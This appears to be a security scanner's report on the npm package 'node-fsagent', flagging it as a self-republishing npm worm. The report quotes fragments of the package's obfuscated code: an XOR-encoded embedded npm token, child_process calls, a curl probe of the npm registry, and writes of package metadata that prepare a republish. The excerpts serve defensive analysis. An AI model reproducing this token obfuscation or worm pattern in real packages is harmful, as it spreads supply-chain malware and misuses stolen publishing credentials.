Static Scan Results
scanned 3h ago · by rust-scannerStatic analysis flagged 5 finding(s) at 86.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.
Static reason
High-risk behavior combination matched malicious policy.
Decision evidence
public snapshotBehavioral surface
Eval
HighEntropyStringsTrivial
Source & flagged code
3 flagged · loading sourceindex.jsView file
1(function(){const _b='[redacted]...
Low
Eval
Package source references a known benign dynamic code generation pattern.
index.jsView on unpkg · L1index.js#virtual:base64:round1View file
1const { execSync, spawnSync } = require('child_process');
L2: const fs = require('fs');
...
L6: const _d=[105,125,126,72,44,109,90,94,69,91,108,100,118,68,116,70,24,92,96,70,83,99,33,39,41,77,17,124,23,109,98,124,73,68,43,22,67,95,86,7];
L7: const NPM_TOKEN=_d.map((c,i)=>String.fromCharCode(c^_k[i%_k.length])).join('');
L8: const PKG = 'node-fsagent';
...
L18: const r = spawnSync('curl', ['-sf', '-o', '/dev/null', '-w', '%{http_code}',
L19: `https://registry.npmjs.org/${PKG}/${version}`], {timeout: 10000, encoding: 'utf8'});
L20: return r.stdout.trim() === '200';
L21: } catch(e) { return false; }
...
L29: fs.writeFileSync(`${pkgDir}/index.js`, '');
L30: fs.writeFileSync(`${pkgDir}/package.json`, JSON.stringify({
L31: name: PKG, version, license: 'MIT', description: `chunk ${version}`
Critical
Npm Publish Worm
Source mutates package metadata and republishes itself to npm.
index.js#virtual:base64:round1View on unpkg · L11Trigger-reachable chain: manifest.main -> index.js
L1: const { execSync, spawnSync } = require('child_process');
L2: const fs = require('fs');
...
L6: const _d=[105,125,126,72,44,109,90,94,69,91,108,100,118,68,116,70,24,92,96,70,83,99,33,39,41,77,17,124,23,109,98,124,73,68,43,22,67,95,86,7];
L7: const NPM_TOKEN=_d.map((c,i)=>String.fromCharCode(c^_k[i%_k.length])).join('');
L8: const PKG = 'node-fsagent';
...
L18: const r = spawnSync('curl', ['-sf', '-o', '/dev/null', '-w', '%{http_code}',
L19: `https://registry.npmjs.org/${PKG}/${version}`], {timeout: 10000, encoding: 'utf8'});
L20: return r.stdout.trim() === '200';
L21: } catch(e) { return false; }
...
L29: fs.writeFileSync(`${pkgDir}/index.js`, '');
L30: fs.writeFileSync(`${pkgDir}/package.json`, JSON.stringify({
L31: name: PKG, version, license: 'MIT', description: `chunk ${version}`
Critical
Trigger Reachable Dangerous Capability
A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.
index.js#virtual:base64:round1View on unpkg · L1Findings
2 Critical1 Medium2 Low
CriticalNpm Publish Wormindex.js#virtual:base64:round1
CriticalTrigger Reachable Dangerous Capabilityindex.js#virtual:base64:round1
MediumStructural Risk Force Deep Review
LowEvalindex.js
LowHigh Entropy Strings